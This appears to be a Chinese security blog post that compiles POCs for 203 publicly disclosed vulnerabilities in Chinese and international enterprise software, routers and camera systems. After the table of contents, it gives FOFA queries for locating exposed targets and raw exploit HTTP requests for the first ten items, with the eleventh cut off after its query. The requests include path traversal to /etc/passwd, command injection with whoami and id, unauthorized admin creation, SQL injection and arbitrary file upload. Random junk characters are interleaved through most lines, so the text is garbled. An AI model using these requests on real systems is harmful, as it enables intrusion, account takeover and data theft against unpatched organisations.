互联网公开漏洞整理202309-202406
- M" h: T6 `* E( F9 H6 l; y8 j2 z道一安全 2024-06-05 07:41 北京8 D3 ]6 @6 o: A/ {4 t6 e5 W
以下文章来源于网络安全新视界 ,作者网络安全新视界- \6 r+ y# m4 }
" x$ D* V6 q4 P# _7 p5 N2 V$ Y- e发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
3 W/ {0 U- c Z/ L( V/ Q; E' i+ i/ f( C
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。& g) l! `: N0 _! l+ t c
( g) s3 F' H. {5 ]# s安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
( C+ a! b) n" }7 p" `" ]3 k( G' S, v; ?# l
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。/ b2 B$ H7 O8 I3 z" q5 `' Z' j
: M7 m# U; U3 s$ B3 F2 `合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。3 ?1 C" g( V- P7 l
; C$ D k" L# D0 P$ y
+ t9 d. r4 O7 p' W声明+ a. K( C2 t# b
+ u, n+ @% G0 h5 W+ N& _
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。9 c9 Q2 k% B d
8 Q, d& \6 b7 `/ R* M% R3 `有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
8 D8 Z3 f" u w; J
! [. e2 J8 X$ U
6 N. A7 O: i% o) x, F9 K$ J& i9 F) `: ]" v
目录. _* O; o$ N- `" L! m- z6 n
. s; ?) Y( {! T4 y s }7 Z, M01
# o" A9 ]8 f; u# o
$ y4 X) g2 g* K1. StarRocks MPP数据库未授权访问
+ j5 ]* e1 B* d$ B7 o2. Casdoor系统static任意文件读取& [3 E1 d+ @: y. Y! k8 |( U
3. EasyCVR智能边缘网关 userlist 信息泄漏4 i% I. u( a* \2 ^1 P. b' \7 K) I" r
4. EasyCVR视频管理平台存在任意用户添加5 @ W$ ]* m( L( m' L6 h
5. NUUO NVR 视频存储管理设备远程命令执行
3 o- I$ S7 H. O6 L- c9 b2 c* i6 e6. 深信服 NGAF 任意文件读取2 y8 A. G' P" N
7. 鸿运主动安全监控云平台任意文件下载
% o" ^, h% h! m) [: [8. 斐讯 Phicomm 路由器RCE% ~ E6 A$ k0 |- O. {- b
9. 稻壳CMS keyword 未授权SQL注入
h! N9 \, M8 r4 C2 e5 @. M& I6 n0 E% [10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
1 c- b3 l) Z+ T! ^4 L+ m, M# K* o11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
3 ~' u3 o5 f' O12. Jorani < 1.0.2 远程命令执行
3 z) ^- z5 [; S6 A' ?/ `, ~# o13. 红帆iOffice ioFileDown任意文件读取) M- E' k( K4 k- H5 ]
14. 华夏ERP(jshERP)敏感信息泄露
8 B8 L# `9 v2 L6 X. D9 F+ A3 z15. 华夏ERP getAllList信息泄露- r2 d7 t0 Y( U$ c
16. 红帆HFOffice医微云SQL注入
- l0 H( S* C# |+ m17. 大华 DSS itcBulletin SQL 注入
" p( z( }2 y A1 z' z' l. ], W18. 大华 DSS 数字监控系统 user_edit.action 信息泄露$ A8 L% q; _- G8 h" c
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
* o* x+ E4 ~; i q. d20. 大华ICC智能物联综合管理平台任意文件读取) Z8 F* U. H8 d2 z
21. 大华ICC智能物联综合管理平台random远程代码执行
1 \# b" x ~3 |22. 大华ICC智能物联综合管理平台 log4j远程代码执行
! I: ]% W4 {% A0 P0 ^: Y% N23. 大华ICC智能物联综合管理平台 fastjson远程代码执行5 D. N) q! n+ C* {7 M
24. 用友NC 6.5 accept.jsp任意文件上传9 g, U1 a/ o- [9 t& o8 J9 N% e
25. 用友NC registerServlet JNDI 远程代码执行
! y& [& p+ _8 g( e26. 用友NC linkVoucher SQL注入0 C4 a2 e. R) ?6 s1 t* @" m/ l
27. 用友 NC showcontent SQL注入
- z8 Z W" u Y28. 用友NC grouptemplet 任意文件上传# g: `, l! J. D9 w: c
29. 用友NC down/bill SQL注入" y: {0 `2 B3 e* ^9 i
30. 用友NC importPml SQL注入
, @- J7 e, V( T31. 用友NC runStateServlet SQL注入6 b; Z# ]0 M& n) V( b+ \* a
32. 用友NC complainbilldetail SQL注入
1 V. g7 {5 X' l) m+ t6 f' I6 z33. 用友NC downTax/download SQL注入5 l1 S; r5 R/ h
34. 用友NC warningDetailInfo接口SQL注入' W) i: w5 E( q p" D U" Z
35. 用友NC-Cloud importhttpscer任意文件上传
% b/ d* N; t1 g; B' v# H36. 用友NC-Cloud soapFormat XXE$ D# O" J* Q, ]' H n7 |, I
37. 用友NC-Cloud IUpdateService XXE' }# T" q* B# E% H y
38. 用友U8 Cloud smartweb2.RPC.d XXE
0 M; u8 C0 o# ~( G! T, q8 u ~39. 用友U8 Cloud RegisterServlet SQL注入# n8 w8 N; a/ @% a
40. 用友U8-Cloud XChangeServlet XXE
; O/ A( w) E( d$ o( v! w4 N. x7 q5 p41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
* p1 |6 q! c1 v8 K42. 用友GRP-U8 SmartUpload01 文件上传
; j/ z/ x! q$ ]! U43. 用友GRP-U8 userInfoWeb SQL注入致RCE
& u1 i3 C- c0 q6 V6 w" @44. 用友GRP-U8 bx_dj_check.jsp SQL注入, M/ P `# ~4 O. H0 Y1 w+ v" m
45. 用友GRP-U8 ufgovbank XXE5 O0 t0 ^! v) M* L; L( r' n. j
46. 用友GRP-U8 sqcxIndex.jsp SQL注入& C- h( ~) j' N4 l6 f* n1 G
47. 用友GRP A++Cloud 政府财务云 任意文件读取- s0 K( O* n& G6 Z% b
48. 用友U8 CRM swfupload 任意文件上传3 G( i* @4 a+ N5 q0 Y. l1 L) a
49. 用友U8 CRM系统uploadfile.php接口任意文件上传/ h2 l8 q p- {* b& F1 d) H
50. QDocs Smart School 6.4.1 filterRecords SQL注入! y$ P J4 h% T. x5 ^$ i
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
5 x* l4 a+ {! I* F) U52. 泛微E-Office json_common.php sql注入5 C9 E2 ]$ B0 C3 S! Q5 B7 j4 x- O, Y
53. 迪普 DPTech VPN Service 任意文件上传/ y. F; }- F- r7 _' E7 J& z8 h. |
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
' ?9 z7 m4 u: S5 F. p' t$ t" L55. 畅捷通T+ getdecallusers信息泄露- c4 C1 s- X% l+ _; _" L, p: B7 K7 J
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
& s# P& g8 ? w% w0 c( H5 {! K57. 畅捷通T+ keyEdit.aspx SQL注入* j& X) v" t- \* p
58. 畅捷通T+ KeyInfoList.aspx sql注入/ v- A2 o+ P8 F6 Z$ D( R- I
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行5 z# R# }1 U6 N$ q3 Z
60. 百卓Smart管理平台 importexport.php SQL注入
4 c! ]& Q7 A, H$ f0 P% L61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
6 ?4 v5 v: j/ q5 W5 N0 g0 a, g9 E62. IP-guard WebServer 远程命令执行
% Q l) z/ T& U6 {- L6 H63. IP-guard WebServer任意文件读取5 ?9 d2 S0 S) l/ Y- u! ?' M( J
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
' O. O1 X& ~0 V3 W* {$ l65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过( l( C# ]- y6 _: @- H+ m: Q
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
5 U" ^ r9 U; v2 ~ x# ?0 C67. 万户ezOFFICE wpsservlet任意文件上传
- o+ M/ f6 n6 B# J7 B68. 万户ezOFFICE wf_printnum.jsp SQL注入& W' C1 j% i" E! y; T; p7 Q
69. 万户 ezOFFICE contract_gd.jsp SQL注入
' T- F1 P1 r' j) O4 S70. 万户ezEIP success 命令执行
& a5 h' P2 V) Z) C6 s# ~71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入5 o0 u X5 J a* v H1 }8 V/ @6 R
72. 致远OA getAjaxDataServlet XXE
2 F5 g$ s/ r3 j( Z2 p' }! a73. GeoServer wms远程代码执行
- V7 A9 i: W8 l7 L74. 致远M3-server 6_1sp1 反序列化RCE$ y% c! u; |3 i; y0 B8 A% \4 Q
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
4 u" Z" a! Q! u7 r* g76. 新开普掌上校园服务管理平台service.action远程命令执行
. a$ q% W6 _7 i; `77. F22服装管理软件系统UploadHandler.ashx任意文件上传8 O. V- q- t! ?. ~4 l3 D1 k, h" a6 m
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
) f4 f7 A# {% {# c: S0 n79. BYTEVALUE 百为流控路由器远程命令执行+ N" m! F7 N3 E* ]7 n7 ?
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传5 x% p. r6 H, o# `
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
4 A8 O# d9 Q, {82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
, u" \) P4 F" v* L8 g$ T/ Y1 N' {83. JeecgBoot testConnection 远程命令执行
: q$ p" g+ y# I2 j8 H84. Jeecg-Boot JimuReport queryFieldBySql 模板注入( {! e$ O% J* g/ T7 {. ?
85. SysAid On-premise< 23.3.36远程代码执行
! Y$ e2 J& a4 y( U86. 日本tosei自助洗衣机RCE4 f: z1 [% n. v" |
87. 安恒明御安全网关aaa_local_web_preview文件上传
& b/ ~4 `6 d% g6 p; q2 E/ U88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
& v) r" h0 z7 ~; ?! F, h89. 致远互联FE协作办公平台editflow_manager存在sql注入' j0 U) P ]) ?8 n2 l
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
& d1 o+ G% I3 @/ g! w) E7 i% x% P91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
/ G+ r6 U$ m" F6 s92. 海康威视运行管理中心session命令执行. L, d. N: o$ [2 h! X# s% e
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传4 Y' h- X5 N2 @' X( M
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传/ t, U9 q0 L( Z7 ]* g! z4 S- W
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行( a; U* C) P8 ~. Q2 U! ?( ?3 j
96. Apache OFBiz 18.12.11 groovy 远程代码执行
}) n5 u C4 b97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
+ o* z: c" E0 s7 f \& P7 Q98. SpiderFlow爬虫平台远程命令执行
% [7 Y) H- d0 c/ y) `) M6 g99. Ncast盈可视高清智能录播系统busiFacade RCE. G) ~. k7 _$ |8 d. M
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传$ z4 {6 s- X n; p
101. ivanti policy secure-22.6命令注入% _) [7 \4 w) T+ s
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
$ A: F8 z9 C- M$ ^# G103. Ivanti Pulse Connect Secure VPN XXE9 N# \ f+ L+ d- n# I" J9 |
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
% A* R6 F4 c' _; Q: d$ P4 h105. SpringBlade v3.2.0 export-user SQL 注入. }7 s. j/ ]% q0 y6 z
106. SpringBlade dict-biz/list SQL 注入
" e4 E0 a( k, c. N) W4 q- P( U107. SpringBlade tenant/list SQL 注入
' h( b8 ]5 m$ J, C9 F/ ]108. D-Tale 3.9.0 SSRF
# u$ M, P3 ]) u9 p: q- x" \9 o109. Jenkins CLI 任意文件读取) [7 v+ _! b: K
110. Goanywhere MFT 未授权创建管理员
$ q4 F) Y$ k8 v5 F0 G5 F111. WordPress Plugin HTML5 Video Player SQL注入
9 h3 o3 k4 F3 _" b112. WordPress Plugin NotificationX SQL 注入. N) G; Q/ r, Z4 z& H, w
113. WordPress Automatic 插件任意文件下载和SSRF2 t: _, t4 q. W. O0 j
114. WordPress MasterStudy LMS插件 SQL注入
* W/ P, f2 j. F115. WordPress Bricks Builder <= 1.9.6 RCE/ ]- E, S! b5 _2 L4 _- a
116. wordpress js-support-ticket文件上传( ~4 b K3 T* N! K7 F. v
117. WordPress LayerSlider插件SQL注入8 U& l" M+ z) @4 }6 p' R0 {" }3 f0 J# q
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
8 t/ _1 @+ X* h5 Y+ m9 I# y, o119. 北京百绰智能S20后台sysmanageajax.php sql注入
5 _; g8 U- S- z: P120. 北京百绰智能S40管理平台导入web.php任意文件上传
7 ]) u6 ]9 U' r2 P% ~: j121. 北京百绰智能S42管理平台userattestation.php任意文件上传8 I3 J* w- y7 Q7 @& d. m
122. 北京百绰智能s200管理平台/importexport.php sql注入9 [0 G2 W1 L1 i( F) n
123. Atlassian Confluence 模板注入代码执行( m( M" n" [" a% \ v' K
124. 湖南建研工程质量检测系统任意文件上传
' {' T5 } \/ S- T125. ConnectWise ScreenConnect身份验证绕过
9 d( n# M- w6 h& O4 [4 m+ d126. Aiohttp 路径遍历
0 V s$ `) a+ U4 b& i( L9 \6 A127. 广联达Linkworks DataExchange.ashx XXE
+ H# A0 I7 u" K# W128. Adobe ColdFusion 反序列化9 C: i) ?6 j: t1 `* X; y
129. Adobe ColdFusion 任意文件读取
3 e1 a) w3 [4 P& t7 H& E z0 |130. Laykefu客服系统任意文件上传/ T/ ?4 f' O2 {( Q# P
131. Mini-Tmall <=20231017 SQL注入# U- H1 S3 v- }! k
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
, m4 {# O# B# E" g+ o0 c) c$ v. K133. H5 云商城 file.php 文件上传
3 q: a+ ~; A; Q& O; B' m/ v134. 网康NS-ASG应用安全网关index.php sql注入% r! r `. c' s/ j: s: ]' U
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
* c1 H: d$ G% l: `, k+ {6 |* g- c' q7 m136. NextChat cors SSRF
# e7 y3 f6 } m8 O$ W# h* U137. 福建科立迅通信指挥调度平台down_file.php sql注入
4 r* P9 Q1 L5 j7 S138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
& A2 r. C5 N1 x$ A* P+ s139. 福建科立讯通信指挥调度平台editemedia.php sql注入, s9 e+ w; k& X, V7 }& L; P5 w
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入- k) K$ G' g7 h( S% e3 M+ {
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入& t% B. C" x: C* ~
142. CMSV6车辆监控平台系统中存在弱密码' w/ N0 |7 W% T6 L1 u" |; }
143. Netis WF2780 v2.1.40144 远程命令执行8 D8 y* f. e$ \7 M0 h
144. D-Link nas_sharing.cgi 命令注入9 X& G3 X M* X& l- C
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
' U2 u3 m: A) \& U1 {( v% i146. MajorDoMo thumb.php 未授权远程代码执行
! C1 t) N% K/ a0 B' h1 G6 \147. RaidenMAILD邮件服务器v.4.9.4-路径遍历/ L3 c1 W6 U9 A1 T
148. CrushFTP 认证绕过模板注入, [2 Q; m! W: {( z6 @5 t
149. AJ-Report开源数据大屏存在远程命令执行
5 G2 y: t+ M9 ?% u2 g, L150. AJ-Report 1.4.0 认证绕过与远程代码执行
) k9 O" p, w0 A6 m151. AJ-Report 1.4.1 pageList sql注入- b! Z+ |$ ]$ ^( d- R3 q) O; \5 ^
152. Progress Kemp LoadMaster 远程命令执行/ k ? j# \3 N" b3 ?! u9 g
153. gradio任意文件读取
& ]/ @6 h% n! y$ a0 K T" _154. 天维尔消防救援作战调度平台 SQL注入
) i# @: e( M2 w155. 六零导航页 file.php 任意文件上传$ f- }5 }/ ~9 c& ]9 x" _
156. TBK DVR-4104/DVR-4216 操作系统命令注入 u4 j; r! e8 a* N. `5 v9 x3 k t4 M
157. 美特CRM upload.jsp 任意文件上传
, Y$ h& {+ I6 c5 r! Z; q158. Mura-CMS-processAsyncObject存在SQL注入 l/ X, A% Q6 w) C- J4 S
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
6 {2 [3 I, U3 C" D7 X160. Sonatype Nexus Repository 3目录遍历与文件读取8 C4 v4 c3 |) P J
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传3 \" i( P" p5 j! [- l
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
# r5 E* I" ^4 Z, i6 m7 `163. 号卡极团分销管理系统 ue_serve.php 任意文件上传0 ^7 `$ D5 \1 W
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
) d% y: D# i9 y4 t$ N* l: g165. OrangeHRM 3.3.3 SQL 注入0 @- A3 n4 i. E% ~% B4 b
166. 中成科信票务管理平台SeatMapHandler SQL注入1 U9 x+ w* S- @& u0 G
167. 精益价值管理系统 DownLoad.aspx任意文件读取- g7 D# J( o0 N5 H* N* n
168. 宏景EHR OutputCode 任意文件读取6 z: j* N1 x/ a- Z
169. 宏景EHR downlawbase SQL注入; F% \1 a" t8 Z5 ?
170. 宏景EHR DisplayExcelCustomReport 任意文件读取) V; A3 |- @3 Q8 a
171. 通天星CMSV6车载定位监控平台 SQL注入
" N0 V: ~" I0 }* P- |5 h172. DT-高清车牌识别摄像机任意文件读取
$ p( m9 }8 X2 H% X1 m! D173. Check Point 安全网关任意文件读取
" M9 f3 r; E8 Y( C, O174. 金和OA C6 FileDownLoad.aspx 任意文件读取+ j, \/ ], L/ Y% T# c" P
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入+ C7 q! a7 N3 f: B
176. 电信网关配置管理系统 rewrite.php 文件上传7 D( y* d& t( z) |: w* Q K+ T
177. H3C路由器敏感信息泄露9 Z1 Z P1 i/ u2 [8 ?- R# d
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
! }; R, U( I8 D) ?+ {179. 建文工程管理系统存在任意文件读取 p! s, T9 F; j
180. 帮管客 CRM jiliyu SQL注入+ c# F3 \' Z3 F+ z& x
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入. P' [) E/ ^* J
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
/ x* N* H" l) d7 s$ D8 O- ~6 X183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入0 ^0 \& O" m, ]% Q) C
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
) F( p+ ?; z% {8 z. E0 G185. 瑞友天翼应用虚拟化系统SQL注入, [0 I8 ?2 f9 ~$ ?7 q8 i% E
186. F-logic DataCube3 SQL注入) r9 f: u' p4 f) R4 P% S
187. Mura CMS processAsyncObject SQL注入
$ O! A: I& L+ X o188. 叁体-佳会视频会议 attachment 任意文件读取/ K( A. t+ \! Y, Z4 {6 d
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
1 J; h: e# M3 @9 k* B. \190. 短视频矩阵营销系统 poihuoqu 任意文件读取- i& K% k5 L3 Z6 u& r/ E
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
8 y) V) A/ h# V6 K5 I% h: ^192. 富通天下外贸ERP UploadEmailAttr 任意文件上传' U {2 |" w3 J& X3 P
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行% L* f) q$ a, U) x4 P9 o, U
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传9 U: u) e( x. a& N d
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
3 ^& p5 A- t1 E- e! M4 k196. 河南省风速科技统一认证平台密码重置5 y9 s- I; `( T5 T: j
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入2 Y8 T& i; ~+ [% ]$ I
198. 阿里云盘 WebDAV 命令注入8 \0 a; x; |: T2 D
199. cockpit系统assetsmanager_upload接口 文件上传
5 O8 v) U; M1 h5 Z \200. SeaCMS海洋影视管理系统dmku SQL注入$ ^) w8 u3 K/ t8 z5 j6 }% |* O4 m! W, h
201. 方正全媒体新闻采编系统 binary SQL注入
1 }" D4 Y# R- d9 k8 m6 L202. 微擎系统 AccountEdit任意文件上传2 [* T0 \! }' C+ O$ ?. i
203. 红海云EHR PtFjk 文件上传
5 R) x! }7 o8 o/ C# F* T8 X7 B0 i Q& H( ?5 s
POC列表
0 w5 A% E. S4 R* j+ \ S1 L- e( \% o
02
: P& v. B5 V0 p8 E6 [. w
2 \; \: x L7 U* w" C. n. W1. StarRocks MPP数据库未授权访问* G5 T& g# P; ?5 y
FOFA :title="StarRocks"
4 S' w# T& N' q! RGET /mem_tracker HTTP/1.1& j+ e! g3 X! c8 a
Host: URL; ?& [; M8 W* S, o: h! N
7 g- k& M: V z" G: x# `. y
7 h% Z* U i# ^, D) v; X" k2. Casdoor系统static任意文件读取
+ h& Y9 x' K* d( hFOFA :title="Casdoor"
3 S" O; f g7 y: I1 P# xGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1* F6 C+ `8 Q& p( R X( D+ Z2 H
Host: xx.xx.xx.xx:9999
: H5 G0 E4 _9 e% B1 H2 AUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) D9 n/ O! {2 ~& ^' X4 |1 [Connection: close
2 d+ V3 v( S- ?/ `" ^5 w4 f. y( `Accept: */*6 O& J6 f1 u2 n# v# A- [$ a
Accept-Language: en3 I3 K B3 ~; Y
Accept-Encoding: gzip
; Z3 c! T( P# j; @+ P2 D, p) A2 y/ w( Y& l1 M$ r# y2 g
' r5 i' d1 v0 P8 E9 [
3. EasyCVR智能边缘网关 userlist 信息泄漏/ [0 [- H, y, [/ L0 m% E
FOFA :title="EasyCVR"
9 `2 A0 E( k4 r e4 tGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
" f% {2 w: x5 j$ J# m! |; GHost: xx.xx.xx.xx% l$ z6 D' a5 n. A) b/ N: i
1 M$ h7 l) b+ |5 C. ~) A
# V* H3 ]( c+ ^5 w) h. Q# y4. EasyCVR视频管理平台存在任意用户添加
I3 j8 D- [1 c1 a7 xFOFA :title="EasyCVR"
) L! t' v5 B5 [4 ~( w. v. M" p; s7 Q# k/ l! a
password更改为自己的密码md5
& v' i9 ]; h* m6 w6 ^: r2 OPOST /api/v1/adduser HTTP/1.13 Z2 y6 u; q$ x4 u! [1 r
Host: your-ip+ X( ?; v+ Y9 h7 Q( ]/ R
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- S" B$ `; {8 E' y5 U1 i. ~ Y" k! O% u
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
' }% f8 E+ _0 Y8 _* X) V
7 M# k! M. [5 v1 r( D) D2 S6 a
8 w7 B7 ]' j0 B6 ]) f- @; i5. NUUO NVR 视频存储管理设备远程命令执行
& h9 j, o8 o' K8 I1 t% H% WFOFA:title="Network Video Recorder Login"
) F: w& j" ?+ I. |+ K7 sGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
) |- i" r+ @9 Z5 L/ B" _) fHost: xx.xx.xx.xx
3 A" R! t$ ?) |5 d) f( M* k8 h( C2 i! B% P4 l
2 |, U. g% _. C4 F* V3 p6. 深信服 NGAF 任意文件读取
/ E7 z: [7 d, j H/ {% \9 e4 iFOFA:title="SANGFOR | NGAF"
6 [* E# _" T) R& j7 S$ WGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.11 G" h; Z) q9 U9 L) m2 J3 ?
Host:* U% T, z; l2 A( G% F. F- I
% S( J* s0 J5 t6 G5 r) Q b# R( z2 u7 S- l; x& m
7. 鸿运主动安全监控云平台任意文件下载/ N( D4 M R H& H0 a
FOFA:body="./open/webApi.html"
/ e% d* y7 I3 GGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1/ N" n4 o( N1 I6 Y+ v
Host:* q! c# c" p% R
$ l4 c5 z% T: D' V& g' [/ x5 |( F& q! ~6 ]9 V/ F( I
8. 斐讯 Phicomm 路由器RCE
, ]7 H' f V N% _FOFA:icon_hash="-1344736688" `, j* w, G" K
默认账号admin登录后台后,执行操作
% u$ ]0 d( A( IPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.16 {2 O& F1 T9 F) b7 {4 M% j; @/ M
Host: x.x.x.x t# }7 N, D- K8 ]3 y( m C3 J
Cookie: sysauth=第一步登录获取的cookie
# G6 m t2 f/ u. U# A5 z6 ?" NContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
5 U( q/ t M, c- a5 c8 `- u K0 [User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
& v& C" Q @" y( S- ~" {3 d! F$ K; d5 c, e
------WebKitFormBoundaryxbgjoytz
3 Z d& j1 E, A9 ]Content-Disposition: form-data; name="wifiRebootEnablestatus"
5 s4 z+ S6 x' P$ a3 v2 m; h" n. M: C) D; R: A
%s0 | c( w8 F4 H% w! e1 z [
------WebKitFormBoundaryxbgjoytz
6 p" C8 ~" c5 v0 N/ W4 {6 k: {7 FContent-Disposition: form-data; name="wifiRebootrange"7 G( b, ~& h* N2 h( ?+ F& g
3 F; V* j$ \5 ]! X9 @3 L12:00; id;
4 K- F2 r# g% b! N------WebKitFormBoundaryxbgjoytz
/ B3 ~& V" U$ QContent-Disposition: form-data; name="wifiRebootendrange"
9 m. H+ F6 `. P
% C" T2 N3 d3 L; ]3 [6 }7 f8 ~%s:( ?6 P/ n* w& U5 r
------WebKitFormBoundaryxbgjoytz
, x' g2 r/ m% _. {6 ^: G4 AContent-Disposition: form-data; name="cururl2"; w; ^0 q! K& ]
2 t& @( ?; O$ I5 f# N4 k
, K( h4 L. D4 g" E6 _
------WebKitFormBoundaryxbgjoytz--! _4 j& G, w F
4 h: e3 D1 C! p* t- F: P
, T, M, H; ~4 t i9. 稻壳CMS keyword 未授权SQL注入
0 R/ G& R; n+ p& }FOFA:app="Doccms"
3 f! c! l3 L0 A2 ]. ]GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1- y) M7 V7 I% E: B
Host: x.x.x.x
8 S5 w6 n: l# z3 m4 N2 y3 h
( ?& J' V. b" v+ i3 F8 R' W
7 u, |* A/ x1 \/ ` E2 z+ g. i) ipayload为下列语句的二次Url编码
9 l* ^9 a! N. T& f' F% {7 S/ w5 V
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#/ z |' H7 T- j& x# F; z
/ O0 F, n! Q) P* `
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
$ \ N( _+ r4 w; Z. V: ]FOFA:icon_hash="953405444"$ \+ j2 H' L7 T( l
6 w! r# r/ ~: e+ G% x文件上传后响应中包含上传文件的路径
- f* }$ |! Q6 t3 X+ e. APOST /eis/service/api.aspx?action=saveImg HTTP/1.1
$ W1 c$ ?- o- D0 k T& s9 CHost: x.x.x.x:xx
5 R) T' g4 [; WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
: F9 { K1 g+ L3 a8 g8 ZContent-Length: 197, h; f" N9 c& F4 W" W. j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9- q: G8 G f5 c. P) C6 A
Accept-Encoding: gzip, deflate
4 D u' {) t @4 a5 tAccept-Language: zh-CN,zh;q=0.9$ T# v7 @( J" f, Y( d! C
Connection: close1 f! n: G0 t1 e( T$ ]7 K/ e q: E( B0 ^- n
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
: s+ r' p) s" ?$ q1 H
8 h7 f! B2 H' a! m- _, i5 w* s------WebKitFormBoundaryxdgaqmqu+ M& e/ @5 F7 Z1 d
Content-Disposition: form-data; name="file"filename="icfitnya.txt"% q( D' T* | K' j& v2 v6 z
Content-Type: text/html* J6 X. P. h, p+ U& r
I- ]. u3 w9 ~+ A: ?jmnqjfdsupxgfidopeixbgsxbf% j3 q& {- m3 m7 y- Q5 W7 D
------WebKitFormBoundaryxdgaqmqu--- d1 C/ O2 }: O; T0 y5 ?8 L( J
& ^) K9 t# \% J& A
4 u7 x+ D! P' H% H4 ]5 ?& w! ~11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
' p/ a. M/ D. c9 Q3 FFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
